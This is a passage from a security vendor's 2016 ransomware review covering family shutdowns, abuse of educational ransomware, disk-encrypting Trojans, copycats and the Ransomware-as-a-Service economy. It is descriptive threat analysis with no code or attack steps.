Departures – and goodbye to TeslaCrypt, Chimera and Wildfire – or so it seemed…


Probably the biggest surprise of 2016 was the shutdown of TeslaCrypt and the subsequent release of the master key, apparently by the malware actors themselves.

TeslaCrypt “committed suicide” – while the police shut down Encryptor RaaS and Wildfire #KLReport

Encryptor RaaS, one of the first Trojans to offer a Ransomware-as-a-Service model to other criminals shut up shop after part of its botnet was taken down by the police.

Then, in July, approximately 3,500 keys for the Chimera ransomware were publicly released by someone claiming to be behind the Petya/Mischa ransomware. However, since Petya used some of the Chimera source code for its own ransomware, it could in fact be the same group, simply updating its product suite and causing mischief.

Similarly, Wildfire, whose servers were seized and a decryption key developed following a combined effort by Kaspersky Lab, Intel Security and the Dutch Police, now appears to have re-emerged as Hades.

Abuse of ‘educational’ ransomware


Well-intentioned researchers developed ‘educational’ ransomware to give system administrators a tool to simulate a ransomware attack and test their defenses. Criminals were quick to seize upon these tools for their own malicious purposes.

Ransomware developed for ‘education’ gave rise to Ded Cryptor and Fantom, among others #KLReport

The developer of the educational ransomware Hidden Tear & EDA2 helpfully posted the source code on GitHub. Inevitably, 2016 saw the appearance of numerous malicious Trojans based on this code. This included Ded Cryptor, which changed the wallpaper on a victim computer to a picture of an evil-looking Santa Claus, and demanded a massive two Bitcoins (around $1,300) as a ransom. Another such program was Fantom, which simulated a genuine-looking Windows update screen.

Unconventional approaches

Why bother with a file when you can have the disk?

New approaches to ransomware attacks that were seen for the first time in 2016 included disk encryption, where attackers block access to, or encrypt, all the files at once. Petya is an example of this, scrambling the master index of a user’s hard drive and making a reboot impossible. Another Trojan, Dcryptor, also known as Mamba, went one step further, locking down the entire hard drive. This ransomware is particularly unpleasant, scrambling every disk sector including the operating system, apps, shared files and all personal data – using a copy of the open source DiskCryptor software.

Attackers are now targeting back-ups and hard drives – and brute-forcing passwords #KLReport

The ‘manual’ infection technique

Dcryptor’s infection is carried out manually, with the attackers brute-forcing passwords for remote access to a victim machine. Although not new, this approach became significantly more prominent in 2016, often as a way to target servers and gain entry into a corporate network.

If the attack succeeds, the Trojan installs and encrypts the files on the server and possibly even on all the network shares accessible from it. We discovered TeamXRat taking this approach to spread its ransomware on Brazilian servers.

Two-in-one infection

In August we discovered a sample of Shade with unexpected functionality: if an infected computer turned out to belong to a financial services organization, it would instead download and install a piece of spyware, possibly with the longer-term aim of stealing money.

Shade downloaded spyware if it found financial software #KLReport

Ransomware in scripting languages


Another trend that attracted our attention in 2016 was the growing number of cryptors written in scripting languages. In the third quarter alone, we came across several new families written in Python, including HolyCrypt and CryPy, as well as Stampado written in AutoIt, the automation language.

A long line of amateurs and copycats

Many of the new ransomware Trojans detected in 2016 turned out to be of low quality: unsophisticated, with software flaws and sloppy errors in the ransom notes.

Poor quality ransomware increases likelihood of data being lost forever #KLReport

This was accompanied by a rise in copycat ransomware. Among other things, we spotted that:

Bart copies the ransom note & the style of Locky’s payment page.
An AutoIt-based copycat of Locky (dubbed AutoLocky) uses the same extension “.locky”.
Crusis (aka Crysis) copies the extension “.xtbl” originally used by Shade.
Xorist copies the whole naming scheme of the files encrypted by Crusis.
Probably the most prominent copycat we discovered this year was Polyglot (aka MarsJoke). It fully mimics the appearance and file processing approach of CTB-Locker.

These trends are all expected to increase in 2017.

“As the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise. We expect ‘skiddie’ ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.”

GReAT, Threat Predictions for 2017

The thriving ransomware economy


The rise of RaaS

While Ransomware-as-a-Service is not a new trend, in 2016 this propagation model continued to develop, with ever more ransomware creators offering their malicious product ‘on demand’. This approach has proved immensely appealing to criminals who lack the skills, resources or inclination to develop their own.

Ransomware is increasingly for hire on the criminal underground #KLReport

Notable examples of ransomware that appeared in 2016 and use this model are Petya/Mischa and Shark ransomware, which was later rebranded under the name Atom.

This business model is increasingly sophisticated:


The Petya ransomware partner site

The partner often signs up to a traditional commission-based arrangement. For example, the “payment table” for Petya ransomware shows that if a partner makes 125 Bitcoins a week they will walk away with 106.25 Bitcoins after commission.
